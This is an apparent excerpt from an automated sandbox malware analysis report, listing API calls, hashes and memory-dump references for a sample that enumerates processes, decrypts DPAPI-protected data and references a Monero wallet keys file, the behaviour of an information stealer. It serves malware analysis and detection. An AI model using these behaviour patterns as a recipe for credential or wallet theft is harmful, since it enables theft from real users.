                                  • Instruction ID: ef3b896feec6b49d6f6785e03a0f74bc156bbbc01651e73c04d59c88de43f45f
                                  • Opcode Fuzzy Hash: 1ae4ef0ce62a2409f50d7ee2ae4aa9027867f327671d86104af7bc5cf0dd802c
                                  • Instruction Fuzzy Hash: 4B012575B40208BBEB10DFD4CD45F9D77B8EB44704F108154FB09BB2C0D671AA008BA5
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00A8961E
                                  • Process32First.KERNEL32(00A90ACA,00000128), ref: 00A89632
                                  • Process32Next.KERNEL32(00A90ACA,00000128), ref: 00A89647
                                  • StrCmpCA.SHLWAPI(?,00000000), ref: 00A8965C
                                  • CloseHandle.KERNEL32(00A90ACA), ref: 00A8967A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                   • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                  • String ID:
                                  • API String ID: 420147892-0
                                  • Opcode ID: 12e85d2f55ac59b7decaad5d340100aceda8e7e149a90059825efc82edc42cb3
                                  • Instruction ID: 34095d82ddce20af3eec337f791d5b93d134a43d426899c2f1cf15c5a026679f
                                  • Opcode Fuzzy Hash: 12e85d2f55ac59b7decaad5d340100aceda8e7e149a90059825efc82edc42cb3
                                  • Instruction Fuzzy Hash: 0B011E75A00208EBCB14DFA5DD58BEEB7F9EF48300F144298A945A7280EB359B40DF51
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                   • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: nn$oQ?}$weZ?$r#X
                                  • API String ID: 0-398326426
                                  • Opcode ID: 42fd980d89ac06f4fcbc049ed5fcbf76a982c32a6650efe964752fcc9ac5e9cd
                                  • Instruction ID: b9768f587b05e31906e0e028d042fe137756c007b23fe587ced096543cd4fc6a
                                  • Opcode Fuzzy Hash: 42fd980d89ac06f4fcbc049ed5fcbf76a982c32a6650efe964752fcc9ac5e9cd
                                  • Instruction Fuzzy Hash: 91A206F3A0C204AFE7046E29EC8577ABBE5EF94720F1A493DE6C4C3744EA3558058697
                                  APIs
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00A905B7), ref: 00A886CA
                                  • Process32First.KERNEL32(?,00000128), ref: 00A886DE
                                  • Process32Next.KERNEL32(?,00000128), ref: 00A886F3
                                    • Part of subcall function 00A8A9B0: lstrlen.KERNEL32(?,006888B8,?,\Monero\wallet.keys,00A90E17), ref: 00A8A9C5
                                    • Part of subcall function 00A8A9B0: lstrcpy.KERNEL32(00000000), ref: 00A8AA04
                                    • Part of subcall function 00A8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A8AA12
                                    • Part of subcall function 00A8A8A0: lstrcpy.KERNEL32(?,00A90E17), ref: 00A8A905
                                  • CloseHandle.KERNEL32(?), ref: 00A88761
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                   • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                  • String ID:
                                  • API String ID: 1066202413-0
                                  • Opcode ID: e9eb856a9752f19d899e02b5d490e1fb5f216b4dd41b4c7c2e1fe5f8b5719527
                                  • Instruction ID: d8cbc614d68c348c8e0d49f3a59ccc7f39c73fa850ca37bd3d6c804bc55e0edf
                                  • Opcode Fuzzy Hash: e9eb856a9752f19d899e02b5d490e1fb5f216b4dd41b4c7c2e1fe5f8b5719527
                                  • Instruction Fuzzy Hash: 0D315971901218ABDB24EB54CD41FEEB778FF55700F5046AAE10AA21A0DF386A45CFA2
                                  APIs
                                  • CryptBinaryToStringA.CRYPT32(00000000,00A75184,40000001,00000000,00000000,?,00A75184), ref: 00A88EC0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                   • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptString
                                  • String ID:
                                  • API String ID: 80407269-0
                                  • Opcode ID: 46e9c5710708a5a48646c1b077df247a361ea83c0e3ee5e96aed7b565883174d
                                  • Instruction ID: 59be46775fb655c544fa24ee6aafcc7d0bfb5f2a4129364b4d1ab9742f974809
                                  • Opcode Fuzzy Hash: 46e9c5710708a5a48646c1b077df247a361ea83c0e3ee5e96aed7b565883174d
                                  • Instruction Fuzzy Hash: 6F1127B0200208FFDB00DF64E885FAB33BAAF89304F509548FA598B250DB39EC41DB60
                                  APIs
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00A74EEE,00000000,00000000), ref: 00A79AEF
                                  • LocalAlloc.KERNEL32(00000040,?,?,?,00A74EEE,00000000,?), ref: 00A79B01
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00A74EEE,00000000,00000000), ref: 00A79B2A
                                  • LocalFree.KERNEL32(?,?,?,?,00A74EEE,00000000,?), ref: 00A79B3F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                   • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptLocalString$AllocFree
                                  • String ID:
                                  • API String ID: 4291131564-0
                                  • Opcode ID: 3b30cc002a489a05e8c6c4427ed26779d626b9fc60520c09f3676cb8e71eef66
                                  • Instruction ID: ea4dd22bd1b0711dd73d1dbb9a9ba4e5021828fbd649b5c5093d110fefe6deb8
                                  • Opcode Fuzzy Hash: 3b30cc002a489a05e8c6c4427ed26779d626b9fc60520c09f3676cb8e71eef66
                                  • Instruction Fuzzy Hash: F01190B4640208AFEB10CF64DC95FAA77B5EB89700F20C159F9199B3D0C7B6A901CB90
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00A90E00,00000000,?), ref: 00A879B0
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00A879B7
                                  • GetLocalTime.KERNEL32(?,?,?,?,?,00A90E00,00000000,?), ref: 00A879C4
                                  • wsprintfA.USER32 ref: 00A879F3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                   • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                                  • String ID:
                                  • API String ID: 377395780-0
                                  • Opcode ID: 638cc00a0596df5f8eb7657244097bd8d813257726a7ec18561c3bc4bb8287bc
                                  • Instruction ID: af42f748655df757633c0ee207f26329a54643714e5ac3abbdeab40415336d4a
                                  • Opcode Fuzzy Hash: 638cc00a0596df5f8eb7657244097bd8d813257726a7ec18561c3bc4bb8287bc
                                  • Instruction Fuzzy Hash: FB1123B2904118ABCB14DFCADD45BBEBBF8FB4CB11F10421AF645A2280E2395940CBB1
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0068EE98,00000000,?,00A90E10,00000000,?,00000000,00000000), ref: 00A87A63
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00A87A6A
                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0068EE98,00000000,?,00A90E10,00000000,?,00000000,00000000,?), ref: 00A87A7D
                                  • wsprintfA.USER32 ref: 00A87AB7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                   • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                  • String ID:
                                  • API String ID: 3317088062-0
                                  • Opcode ID: 320ebf5ea254176750d3810189edb6d9e99949d71064cfc80754d9df61ca0abd
                                  • Instruction ID: b5e84384d97b9eb2bc76fcb1199048c2ce29f3069796083c52e72acaec6e3de4
                                  • Opcode Fuzzy Hash: 320ebf5ea254176750d3810189edb6d9e99949d71064cfc80754d9df61ca0abd
                                  • Instruction Fuzzy Hash: 0B118EB1A45218EBEB209B54DC49FADB7B8FB04761F10479AE91AA32C0D7745E40CF91
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                   • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: ](?w$t_H$${o/
                                  • API String ID: 0-3858438325
                                  • Opcode ID: 91cc20d367abdaa2aa0e339b8777069f9b6457bb7e1571dc0e100fb386c010dc
                                  • Instruction ID: a1887935dada14b8057e7a2711c245ce926daa4e1d47c6b288337d22d26bc009
                                  • Opcode Fuzzy Hash: 91cc20d367abdaa2aa0e339b8777069f9b6457bb7e1571dc0e100fb386c010dc
                                  • Instruction Fuzzy Hash: 9EB22BF3A0C204AFE3046E2DDC8567BB7D9EF94720F1A463DEAC5C3744EA3598018696
                                  APIs
                                  • CoCreateInstance.COMBASE(00A8E118,00000000,00000001,00A8E108,00000000), ref: 00A83758
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00A837B0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                   • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharCreateInstanceMultiWide
                                  • String ID:
                                  • API String ID: 123533781-0
                                  • Opcode ID: 61f169c0aae62fd1685a601dd2ca9de5969c4ab6bea57e0f2db1b0a30b5e2ba0
                                  • Instruction ID: 0bda2a2acd02cd89e98b0ca2a4163d4a00962c1042119f39953d026e328d96d3
                                  • Opcode Fuzzy Hash: 61f169c0aae62fd1685a601dd2ca9de5969c4ab6bea57e0f2db1b0a30b5e2ba0
                                  • Instruction Fuzzy Hash: 4441E971A40A28AFDB24DF58CC95B9BB7B5BB48702F4042D8E609E72D0D7716E85CF50
                                  APIs
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00A79B84
                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00A79BA3
                                  • LocalFree.KERNEL32(?), ref: 00A79BD3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                   • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$AllocCryptDataFreeUnprotect
                                  • String ID:
                                  • API String ID: 2068576380-0
                                  • Opcode ID: c2e5ef6dc34f7f3120307aa8d0e3befdeff0bc0a0d45fe4266b0f16a8633f95e
                                  • Instruction ID: 3302380084635085737e49d240de51142285a22f0e8883f7c8f21ea054c6d8ef
                                  • Opcode Fuzzy Hash: c2e5ef6dc34f7f3120307aa8d0e3befdeff0bc0a0d45fe4266b0f16a8633f95e
                                  • Instruction Fuzzy Hash: C0110CB8A00209EFCB04DF94D995AAE77B5FF89300F108599E915A7350D770AE10CF61
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                   • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: Cw
                                  • API String ID: 0-3441118413
                                  • Opcode ID: 63b95dd45f994a0ed9eddd7c46e0473990d19410431665c121f949bc02c34352
                                  • Instruction ID: dbca6789d42a084c6d7067560d5bb34c77b11a67d4ca765aa90f35922088be64
                                  • Opcode Fuzzy Hash: 63b95dd45f994a0ed9eddd7c46e0473990d19410431665c121f949bc02c34352
                                  • Instruction Fuzzy Hash: 0F7159B350C3089FD304BE3CEC8967ABBE5EB54620F1A4A3DEAC4C7744F93588018696
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                   • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmp
